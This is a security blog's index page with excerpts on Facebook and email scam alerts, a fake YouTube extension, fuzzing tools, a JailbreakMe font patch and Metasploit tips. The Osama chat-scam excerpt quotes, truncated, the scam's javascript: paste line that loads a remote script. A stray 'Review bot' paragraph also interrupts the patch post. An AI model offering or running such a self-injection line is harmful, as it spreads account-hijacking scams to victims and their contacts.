blogs
Alert - Fake YouTube Premium plugin is being used in the latest Facebook scam.
I was checking my Facebook and suddenly the following caught my attention:
On clicking the download button, it downloaded an extension for my Firefox, so I decided to analyze it. I unpacked it and saw the following:
On opening the file youtube.js, I can see the following code:
It downloads a script from another source, so let's see what it contains: read more »
[Facebook Scam Alert] Free AVTAR DVD
There is a new scam on Facebook, which displays a message - free avtar dvd.
It points to the avtar-dvd.info URL. If you click on it, it will display a link to a survey as below:

On clicking it, you have to fill in a survey:

Beware, no one gives you a blockbuster movie DVD for free :)
Metasploit vs Sulley
I have been working with Metasploit and Sulley lately, developing a couple of fuzzers. I think Sulley is a much better choice for writing fuzzers. The reason is that it does intelligent fuzzing rather than dumb fuzzing.
For example, if you have a protocol where the length is denoted as 2 bytes BE, it makes sense to fuzz at extreme values, i.e. 0xFFFF or 0x0000. It does not make sense to fuzz each and every value like 0x0002, 0x0003.
Sulley does a good job here, while in Metasploit you need to generate random data, which can be of any range. read more »
fix for lorcon2, ruby 1.9.2
Faced a minor problem with the Lorcon2 wrapper module when compiling with ruby 1.9.2. The following will fix the issue for those who are facing it:
Change the STR2CSTR calls in the file ruby-lorcon-1.0.0/Lorcon.c at lines 443, 441:
driver = STR2CSTR(rbdriver);
intf = STR2CSTR(rbintf);
as
driver = StringValuePtr(rbdriver);
intf = StringValuePtr(rbintf);
Hope it helps.
SecGeeks partners with Hacker Halted USA 2011
Hacker Halted USA, October 21-27 in Miami, is the EC-Council's flagship IT security event for both technical experts and C-Level executives. It hosts lots of technical training courses and a two-day conference with exhibits.
The conference track themes include cloud security, SCADA, and timely topics chosen by peer review and input from 450 training companies worldwide. read more »
Apple JailBreakme 3.0 pdf vulnerability fix
It seems that the Apple JailbreakMe PDF vulnerability, which according to VUPEN was a 0-day, has been fixed.
If we look at the patch, only a minor check was added:
+ if ( arg_cnt < 0 || subr_no < 0 )
+ goto Unexpected_OtherSubr;
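Review bot: the new condition rejects only negative arg_cnt and subr_no, and nothing in these two lines bounds either value from above. If either one is later used as an index or a count, an upper-bound check against the relevant table or stack size belongs next to this one, or the surrounding context should show where that limit is enforced. A one-line comment saying how a negative value can reach this point would also help the next reader.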
So, as you might have guessed, the vulnerability is that if a font file has arg_cnt < 0 or subr_no < 0 (that is, a value > 0x7FFFFFFF), it will cause problems :)
cheers,
secgeek
[Facebook Scam Alert] Photographer commited SUICIDE 3 days after shooting THIS video!
I have come across another scam with the title "Photographer commited SUICIDE 3 days after shooting THIS video!".
It basically displays the following on the infected user's profile:

After the user clicks on Jaa, it uses a new trick: it opens the Facebook share page and resizes it, and when you click on Jaa, it shares the link on the user's profile.

After that it opens a survey.
read more »
[Facebook Chat Scam] Osama is dead, Watch the video below
So here is another one of the scams related to Osama's death. This one sends a chat message to your friends on Facebook. It sends a URL in tinyurl form which on opening displays the following page:

It tells you to copy and paste the following javascript code:
javascript:(a=(b=document).createElement('script')).src='//pro.
When you paste the javascript code in your address bar, it sends the malicious links to all your friends on Facebook. read more »
[Facebook Scam Alert] Prince William & Catherine Middleton First Kiss Video
So today is the day when Prince William & Catherine got married, and scammers have already started using this for Facebook likejacking.
We got one URL which on opening displays a message:
"Prince William & Catherine Middleton First Kiss Video" and shows the following picture:

When we look at the code, it contains the following javascript code:

so there is one like TAG.
read more »
Converting local file format metasploit modules to web module
I have been working with Metasploit. Sometimes I want fileformat modules to be delivered over the web, but Metasploit mostly creates the exploit files in the C:\framework\msf3\data\exploits folder.
Now what if I want to run a web server and deliver these to the client? I have to do it manually. This happens with most of the fileformat modules.
So if you have faced the same problem, you can follow the tips I am going to mention in this article.
Let's take a simple module, C:\framework\msf3\modules\exploits\windows\fileformat\adobe_jbig2decode.rb read more »
Google translation feature added to secgeeks.com
Dear Users,
I have noticed that secgeeks.com has visitors from so many countries, and not all of them know English, which is the primary language of the site. So I have added the Google Translate feature to secgeeks.com. You can see it on the right-hand side. Using this feature you can translate secgeeks.com into your favorite language.
Happy new year 2011, and I hope you will enjoy this feature.
Thanks,
SecGeek
WinDbg Vs OllyDebugger
I have used both debuggers, WinDbg and Olly, but I like WinDbg for various reasons:
1. It has symbol support. You can just add the symbol path in the config and it will give you all the function names during debugging. You can do this in Olly too, but using WinDbg is better.
2. You can use various windows like disassembly, memory and command. This makes sense if you are debugging and need to quickly check memory or disassembly.
3. It has command line support, which speeds up debugging.
4. Remote debugging: you can debug remotely.
Which one do you use and why?
Wish you all a very happy new year 2011
Dear All,
Secgeeks.com wishes you all a very happy new year 2011.
"May what you see in the mirror delight you, and what others see in you delight them. May someone love you enough to forgive your faults, be blind to your blemishes, and tell the world about your virtues.
May the telemarketers wait to make their sales calls until you finish dinner, may the commercials on TV not be louder than the program you have been watching, and may your check book and your budget balance - and include generous amounts for charity. "
Wishing you again a very happy new year. read more »
How to Reset AD Password for Windows Server 2000, 2003 and 2008?
Have you ever forgotten an Active Directory (AD) password? Do you know how to reset an AD password? Is there any Windows password reset software to do an AD password reset? If not, what can you do to reset an AD password? Before answering these questions and doing an AD password reset, you need to know what Active Directory, a Windows domain and a domain controller are.
What is Active Directory? read more »
Alert : Fake LinkedIn Messages Emails
If you are a LinkedIn user, then be careful when opening any message with the subject "LinkedIn Messages". I am receiving lots of such emails like the one below:
All links in these mails point to various malicious URLs. read more »
Alert : Fake Ebay Emails
I have received a couple of emails pretending to come from alert@ebay.ws. They contain the following message body:
"According to eBay @ 2010 license agreement , you are required to
update your eBay Buyer Protection service .
Please read and fill in the attached form , then sign in to your
account and start buy or sell in minutes , with our new easy to
use features , now with lots of discounted offers ."
The email contains an HTML attachment which, when opened, gives you a page like this:
read more »
How to Reset Windows Password with Windows Password Unlocker Standard?
Today many PC users easily forget the Windows passwords they set for their computers. Windows Password Unlocker Standard is designed to help users recover a forgotten Windows administrator password and other user passwords by burning a bootable CD/DVD. If you've forgotten your Windows password, you can try this Windows password recovery tool and follow the instructions below to recover your lost password.
Before starting, a bootable CD/DVD and a computer with CD drive are required. (Internal CD drive and external CD drive are both OK.) read more »
SecuritySuite malware removal
The most popular trend in Internet scams nowadays is fake and rogue antispyware. Such antispyware tries to convince users that they have plenty of infections to remove, showing basically the same alerts and nag screens as regular software products combating viruses. read more »
Alert : Fake Join my network on LinkedIn Emails
It seems that spammers have now started using the well-known LinkedIn.com website to spam users. I got a message from an unknown user asking me to connect to his network on LinkedIn. But when I looked carefully at the links, I found that the links in the email do not point to linkedin.com but to hxxp://lccvnvxx.info/
See the image below:

So if you have received any such invitation to connect on LinkedIn, then double check it!!
discounted/free iPad offer for secgeeks visitors/users from hacker halted
Make plans now to attend the fifteenth annual Hacker Halted information security event - October 9-15 in Miami. The format includes a 4-day training Academy, followed by a 2-day conference on October 13-14 and 1-day of free Training (October 15) for all registrants. The two-day Conference features a comprehensive program presented in three tracks.
Register for the 2-day conference by August 31 and receive a FREE iPad onsite. No tricks or anything else to purchase. read more »

